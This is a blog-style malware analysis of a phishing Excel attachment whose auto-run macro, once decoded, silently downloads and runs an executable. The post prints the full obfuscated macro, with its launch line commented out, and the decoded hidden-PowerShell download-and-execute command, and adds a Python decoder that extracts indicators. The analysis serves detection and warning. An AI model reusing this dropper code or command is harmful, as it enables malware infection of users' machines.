Wednesday, 3 May 2017

Virus

A few days ago a well-crafted email arrived, without the usual spelling or translation mistakes, but from an unknown sender, so I was asked to check whether the attachment could be opened.

The file attached to the email was a password-protected zip.

It was in fact a virus/malware, which my antivirus later classified as "behavior monitoring"; let's look at how it is built.


This is the text of the email:


The attachment "Order List and Products Samples.xls&doc.zip", protected by the password given in the email, contained 2 Excel files:

Order List.xls
Products Samples.xls

So I disabled macros in Excel and opened the files.

They contained the following image:


but there was also a macro that runs automatically when the Excel file is opened:


The macro is apparently incomprehensible (I include it in full at the end of the post), because in practice it is encoded and, by calling a function internal to the macro, it assembles some strings containing the commands to execute.

This is the decoding command:

dxvtzzksf = craftmind(Mid(metalnerve, dayseminar, 1), "24=*$H2=950_KJV9V+_q+71Q02<<V{gKgQ5>$Q51Gg4")
wezvdmfahy = wezvdmfahy & dxvtzzksf

Executed in a loop over every character of metalnerve, it calls the craftmind function and builds a command in the variable wezvdmfahy.

For example, the following command is built:

"Cmd.exe /c powERSheLL.EXE -wINdOwsTYLE hidDen -nOprofIlE -exeCUTiONPOLICy BypAss (NEw-ObjECt SYsTeM.NEt.WebClIENT).DoWnlOAdFilE('http://soliotex.com/spfiles.exe','%TEMP%\\spfiles.exe') & %TEMP%\\spfiles.exe"

Then, with: destroysnow = Replace(destroysnow, "UEnOer", "")

you get "wsCRIPT.ShelL"

Finally

Call VBA.CallByName(zzjokpxkruedw, dxvtzzksf, 34 - 33, wezvdmfahy, Len("34902") - 5)

causes the commands that have been assembled to be executed.

The executable file "spfiles.exe" is downloaded; the file has the following characteristics:
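To make the decoding concrete, here is an added Python port of the macro's craftmind() filter and of the Replace() unmasking, run over the three string fragments copied from the macro below; this is example code written for this post, not part of the original macro, and the extract_iocs() helper is my own addition for pulling the download URL and drop path out of the result.

```python
import re

# Wildcards of the VBA Like operator. The macro tests  key Like "*" & ch & "*",
# so a wildcard in ch makes the pattern match (for "*" and "?" against any
# non-empty key) and the character is dropped. Treating "[" and "#" the same
# way is an assumption; only "*" occurs in this sample, and it is in the key anyway.
LIKE_WILDCARDS = set("*?#[")

def craftmind(ch: str, key: str) -> str:
    """Port of the macro's craftmind(): keep ch only if the key string does not contain it."""
    if ch in LIKE_WILDCARDS or ch in key:
        return ""
    return ch

def decode(encoded: str, key: str) -> str:
    """The Workbook_Open loop: wezvdmfahy = wezvdmfahy & craftmind(Mid(metalnerve, i, 1), key)."""
    return "".join(craftmind(ch, key) for ch in encoded)

def unmask(s: str, junk: str) -> str:
    """Second trick in the macro: Replace(s, junk, "") removes a junk token spliced into a name."""
    return s.replace(junk, "")

def extract_iocs(command: str) -> dict:
    """Defender's view of the decoded command: the download URL and the local drop path."""
    url = re.search(r"https?://[^'\"\s]+", command)
    path = re.search(r"%TEMP%\\+[^'\"\s]+", command)
    return {"url": url.group(0) if url else None,
            "drop_path": path.group(0) if path else None}

# Key and string fragments copied verbatim from the macro (metalnerve & eaglegroup & reflectteam)
KEY = "24=*$H2=950_KJV9V+_q+71Q02<<V{gKgQ5>$Q51Gg4"
METALNERVE = r"$JJCm>dK4.<<ge4xe g5$/Jc= =pow2gEKRS__*hQ9eVLLQV.>EgXQE<2 54-*9wgI>N1$dHOw2s_5qTQVY1gL24E$K h+$iV5*dD+Qe59n 5-n<Op$=Qr2Qo21_f9+IlKEK0G -+VQexHeQ_C9<U4TQi=_4O9NQPO>KgLI>4_CK=y*g "
EAGLEGROUP = r"gBQVy_pA5sJs>2 (KN$=0Ew0-O_b4j11EVCG$t> Q_S595YQsHT5Qe79MG.N=0KE{0tVV.g_WVeg_b_HC>+l1IJ$E2N5T5=)g9.2D0o<JW1nQ2lqOAq+Kdg2Fi+GlH1EV9(_VG'h$5t21=tpq1:9/*/_sgo5Kli<otVe1x{Q.V5Qc_K0o"
REFLECTTEAM = r"g2m/QspH7fVilg*eJ$s.e>x91e_q'g,'%+gVT_EMP%4\K\GQs=pf_2i{$$le+s_.eq+xK1e5'417) &7 5%$TGE=QM0P54%K\VQ\0s=*{pQf>i7l>4+eqs1.ex22e"

def decoded_command() -> str:
    """The command string that ends up in wezvdmfahy."""
    return decode(METALNERVE + EAGLEGROUP + REFLECTTEAM, KEY)

if __name__ == "__main__":
    cmd = decoded_command()
    print(cmd)
    # CreateObject("wsCRIPT.ShelL") then CallByName(obj, "RUN", 1 = VbMethod, cmd, 0 = hidden window)
    print(unmask("wsUEnOerCUEnOerRIUEnOerPT.UEnOerShUEnOerelLUEnOer", "UEnOer"),
          unmask("eiowneiownRUeiownNeiown", "eiown"))
    print(extract_iocs(cmd))
```

The random mixed case in the decoded command survives the filter untouched, which is why case-insensitive matching matters when hunting for this pattern in process-creation logs.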


Note that if I try to download the file with Chrome, it is blocked with the message:


whereas if I run the command directly from CMD I then find the file in the \Temp folder.

This is the antivirus alert:


So watch out, folks, watch out!

Full macro source (I have commented out the line that launches the commands):

Public Sub Workbook_Open()
eaglegroup = "gBQVy_pA5sJs>2 (KN$=0Ew0-O_b4j11EVCG$t> Q_S595YQsHT5Qe79MG.N=0KE{0tVV.g_WVeg_b_HC>+l1IJ$E2N5T5=)g9.2D0o<JW1nQ2lqOAq+Kdg2Fi+GlH1EV9(_VG'h$5t21=tpq1:9/*/_sgo5Kli<otVe1x{Q.V5Qc_K0o"
Dim iolsranghngbkftd As Long
iolsranghngbkftd = 44.832
'raiseskulllaptopquestion
If iolsranghngbkftd <> 230.537 Then
Dim brainclog As Integer
brainclog = 10.84
Dim alientaxi As Boolean
alientaxi = 217.28
Dim joxiqvgxdvgkqmgyopy As Long
joxiqvgxdvgkqmgyopy = 91.619
'ycbegsrtudqczxoqcnykmdjjzlogrwnwwfw
Dim dreamtraffic As Integer
dreamtraffic = 199.708
'offstruggleassiststick
Dim slwqxskkifrtvenu As Long
slwqxskkifrtvenu = 200.104
'ruebqudmmebblabtackle
End If
reflectteam = "g2m/QspH7fVilg*eJ$s.e>x91e_q'g,'%+gVT_EMP%4\K\GQs=pf_2i{$$le+s_.eq+xK1e5'417) &7 5%$TGE=QM0P54%K\VQ\0s=*{pQf>i7l>4+eqs1.ex22e"
Dim rzbfufttloytjs As Long
rzbfufttloytjs = 130.134
'merryturkeybottomeconomy
If rzbfufttloytjs > 188.414 Then
Dim arrestthere As Long
arrestthere = 162.5
Dim chiefvery As Integer
chiefvery = 117.885
Dim yixagrgcr As Long
yixagrgcr = 200.738
End If
Dim candyfault As Boolean
candyfault = 13.585
If candyfault > 23.534 Then
Dim vwlilpqhuxtipaskn As Long
vwlilpqhuxtipaskn = 7.115
'actressgiantyoyiwlkldcxh
Dim jbshgptnywhlrbpj As Byte
jbshgptnywhlrbpj = 45.835
Dim ydvehonazfhowoy As String
ydvehonazfhowoy = "aeefksshtloph"
Dim jddslzdfsknuyqdepv As Integer
jddslzdfsknuyqdepv = 181.785
End If
metalnerve = "$JJCm>dK4.<<ge4xe g5$/Jc= =pow2gEKRS__*hQ9eVLLQV.>EgXQE<2 54-*9wgI>N1$dHOw2s_5qTQVY1gL24E$K h+$iV5*dD+Qe59n 5-n<Op$=Qr2Qo21_f9+IlKEK0G -+VQexHeQ_C9<U4TQi=_4O9NQPO>KgLI>4_CK=y*g " & eaglegroup & reflectteam
Dim hthtzusrclibawldwhp As Boolean
hthtzusrclibawldwhp = 176.19
'fanobligewldlriazw
If hthtzusrclibawldwhp = 223.647 Then
Dim jhuwvmdasyhlngd As Integer
jhuwvmdasyhlngd = 40.49
Dim blushexit As Long
blushexit = 107.607
Dim crouchship As Byte
crouchship = 69.793
Dim mjzylkwylerwg As Boolean
mjzylkwylerwg = 101.142
'garmentpandanutother
End If
Dim kwgsfdzsgi As Integer
kwgsfdzsgi = 216.607
'cinnamonmanageboiltooth
Dim clothlive As Integer
clothlive = 218.863
Dim babygap As Byte
babygap = 70.12
'busymancoconutglide
wezvdmfahy = ""
Dim petsniff As Double
petsniff = 227.631
Dim includerubber As Byte
includerubber = 226.16
Dim ylljenciotrnbmbozac As Integer
ylljenciotrnbmbozac = 208.153
'bombmiddlecitizenevoke
If ylljenciotrnbmbozac < 194.709 Then
Dim birthugly As Long
birthugly = 203.59
Dim satisfysing As Integer
satisfysing = 218.885
'cliffswimauctioncelery
Dim dropvapor As Integer
dropvapor = 140.22
End If
For dayseminar = 1 To Len(metalnerve)
Dim whohxodurmteyyotxy As Long
whohxodurmteyyotxy = 162.459
Dim defensepresent As Double
defensepresent = 121.304
Dim iwrgpvwduuj As Integer
iwrgpvwduuj = 2.986
dxvtzzksf = craftmind(Mid(metalnerve, dayseminar, 1), "24=*$H2=950_KJV9V+_q+71Q02<<V{gKgQ5>$Q51Gg4")
wezvdmfahy = wezvdmfahy & dxvtzzksf
Dim bxadkhschpylpd As Integer
bxadkhschpylpd = 67.874
'benchcreamsqueezeterm
Dim girlpraise As Long
girlpraise = 20.759
Dim fcuvvpihqzl As Integer
fcuvvpihqzl = 96.874
Dim toolvapor As Integer
toolvapor = 147.856
Dim vppbrpbvbzr As Double
vppbrpbvbzr = 152.141
Next
Dim insaneobtain As Long
insaneobtain = 174.536
'bqxhwzeltivegavixydclimbsail
If insaneobtain > 225.757 Then
Dim exactillness As Double
exactillness = 55.322
Dim hivnwlmjr As Integer
hivnwlmjr = 181.932
'muscleoffkxxhqntrjdyildntd
Dim footportion As Integer
footportion = 109.374
Dim iszxdpkyunmrpan As Double
iszxdpkyunmrpan = 38.553
'psjxlaefmurodustimpose
End If
Dim hopesurvey As Double
hopesurvey = 181.116
Dim isfptlrxoyldjthyrpr As Boolean
isfptlrxoyldjthyrpr = 239.81
Dim hzibrwpaqygcul As Byte
hzibrwpaqygcul = 31.93
destroysnow = "wsUEnOerCUEnOerRIUEnOerPT.UEnOerShUEnOerelLUEnOer"
Dim erajump As Boolean
erajump = 201.376
'imthesonhidjrpvggbmsqxk
If erajump = 62.812 Then
Dim qwwwzvoktpcxotx As String
qwwwzvoktpcxotx = "manualvictory"
'guitarmeritinhkrgloktzsrhhry
Dim cloudpaddle As String
cloudpaddle = "bardrum"
End If
destroysnow = Replace(destroysnow, "UEnOer", "")
Dim dckmxwierruvfufh As Byte
dckmxwierruvfufh = 236.166
'ptzvrrhhieuteougpkr
Dim mbnrtgrfkzc As Long
mbnrtgrfkzc = 76.15
Dim thanktravel As Double
thanktravel = 156.65
Dim kvdymawknajgr As Double
kvdymawknajgr = 106.21
Dim currentinherit As Byte
currentinherit = 123.918
Dim cjhoxupxatcajmkl As Double
cjhoxupxatcajmkl = 212.729
'dyrffonfflhugkqvvtlibertytool
Dim qkpogadjh As Double
qkpogadjh = 47.471
Dim lovetail As Double
lovetail = 251.368
'rescueimcekbjwun
Dim clifftask As Boolean
clifftask = 101.927
'coyotedaringngumcranoztponff
Set zzjokpxkruedw = CreateObject(destroysnow)
Dim iazurshzpra As Boolean
iazurshzpra = 116.98
If iazurshzpra > 80.985 Then
Dim twrjmoneoubu As Integer
twrjmoneoubu = 215.87
'nxuxhnpuxalleyjazz
Dim gmijzwnoiezsbybq As String
gmijzwnoiezsbybq = "authorthrive"
'distancesuspectruntotal
Dim crucialfather As String
crucialfather = "snxaxscwztgh"
Dim flashjust As Long
flashjust = 212.614
End If
dxvtzzksf = Replace("eiowneiownRUeiownNeiown", "eiown", "")
Dim cyfospoaasfoht As Long
cyfospoaasfoht = 85.124
If cyfospoaasfoht < 107.967 Then
Dim lonelytraffic As Byte
lonelytraffic = 96.41
Dim tualzudkhwfgihra As Boolean
tualzudkhwfgihra = 81.961
Dim beanstruggle As Integer
beanstruggle = 53.445
'crazyoffermenuquiz
Dim moazcyhfr As Integer
moazcyhfr = 229.692
Dim ptzwfjebix As Double
ptzwfjebix = 45.356
'rmmokylbuopalmrace
End If
' ---- WARNING ---- command launch line commented out
'Call VBA.CallByName(zzjokpxkruedw, dxvtzzksf, 34 - 33, wezvdmfahy, Len("34902") - 5)
' ------------------------------------------------------
Dim learnvelvet As Boolean
learnvelvet = 2.121
'crypencilmrkgasqjagwimcjg
If learnvelvet <> 223.69 Then
Dim officetube As Integer
officetube = 182.406
Dim firering As Double
firering = 126.321
Dim quitswarm As Double
quitswarm = 35.787
'flstzcdcddfmokptwiwhlimah
Dim cannonprivate As Byte
cannonprivate = 83.148
End If

Dim bpektawab As Boolean
bpektawab = 15.729
'dressresembledizzylizard
Dim fruithospital As Byte
fruithospital = 124.877
Dim elephantplace As String
elephantplace = "pyupwlzsgsesjogc"
Dim olivequantum As Boolean
olivequantum = 174.257
'mistaketellclusterpudding
Dim surgewant As String
surgewant = "chasejust"
End Sub
Function craftmind(awrocxifwhdpbzlwev, stadiumtrue)
retVaawrocxifwhdpbzlwev = ""
Dim ladderspot As Double
ladderspot = 171.9
If ladderspot > 137.912 Then
Dim trujecqfdn As Double
trujecqfdn = 6.68
Dim vrnscxffkklozbb As Byte
vrnscxffkklozbb = 206.831
'bodyflushcemicpvkbxvcvjyysg
Dim fdalrtffkq As Byte
fdalrtffkq = 65.877
Dim bcqjcxtlxjtdzoxzwcx As Integer
bcqjcxtlxjtdzoxzwcx = 176.794
'jsgzijpohzcfaujiwbpxmgbeqfmtm
Dim sdcptgqroqfjpk As Byte
sdcptgqroqfjpk = 62.585
'changetortoisecnnghuqklglcp
End If
zjpgfbadiggqbjbb = "*" & awrocxifwhdpbzlwev & "*"
Dim fvbmcjqvmjeayiyh As Byte
fvbmcjqvmjeayiyh = 69.11
Dim rudesolve As Integer
rudesolve = 162.413
Dim bicyclejunior As Integer
bicyclejunior = 225.708
'cannontimberkepsmbpot
If bicyclejunior < 109.204 Then
Dim flnijswyk As String
flnijswyk = "beachenhance"
Dim jejkarsltaltubm As Double
jejkarsltaltubm = 195.858
End If
dxvtzzksf = ""
Dim pausesleep As Long
pausesleep = 176.616
If pausesleep = 114.444 Then
Dim coolprevent As Byte
coolprevent = 47.44
Dim blymrrcupyquepkvurk As Long
blymrrcupyquepkvurk = 145.457
Dim accountbrother As Long
accountbrother = 15.151
'imuhjyesdjouabfcultureexpose
End If
If Not stadiumtrue Like zjpgfbadiggqbjbb Then
dxvtzzksf = awrocxifwhdpbzlwev
End If
craftmind = dxvtzzksf
Dim oqgidcyjtrzcxyysqey As Boolean
oqgidcyjtrzcxyysqey = 207.787
Dim keeprace As Long
keeprace = 177.348
'qiwulyjbtqtckbbpgtzedkinr
Dim carpetcrop As Byte
carpetcrop = 70.13
Dim biologyfoster As Byte
biologyfoster = 237.112
End Function



